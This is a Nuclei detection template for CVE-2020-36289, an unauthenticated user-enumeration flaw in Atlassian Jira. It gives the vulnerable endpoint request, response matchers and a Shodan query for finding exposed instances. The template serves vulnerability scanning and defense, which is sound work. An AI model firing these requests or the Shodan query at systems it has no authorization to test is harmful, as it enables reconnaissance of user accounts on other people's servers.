nuclei-templates/cves/2020/CVE-2020-36289.yaml

41 lines
1.3 KiB
YAML

id: CVE-2020-36289
info:
name: Atlassian Jira Unauth User Enumeration
author: dhiyaneshDk
severity: medium
description: Affected versions of Atlassian Jira Server and Data Center allow an unauthenticated user to enumerate users via an Information Disclosure vulnerability in the QueryComponentRendererValue!Default.jspa endpoint. The affected versions are before version 8.5.13, from version 8.6.0 before 8.13.5, and from version 8.14.0 before 8.15.1.
reference:
- https://twitter.com/ptswarm/status/1402644004781633540
- https://nvd.nist.gov/vuln/detail/CVE-2020-36289
- https://jira.atlassian.com/browse/JRASERVER-71559
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N
cvss-score: 5.3
cve-id: CVE-2020-36289
cwe-id: CWE-200
metadata:
shodan-query: http.component:"Atlassian Jira"
tags: cve,cve2020,jira,atlassian,unauth
requests:
- method: GET
path:
- '{{BaseURL}}/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
- '{{BaseURL}}/jira/secure/QueryComponentRendererValue!Default.jspa?assignee=user:admin'
matchers-condition: and
matchers:
- type: status
status:
- 200
- type: word
words:
- 'rel=\"admin\"'
- type: word
words:
- 'application/json'
part: header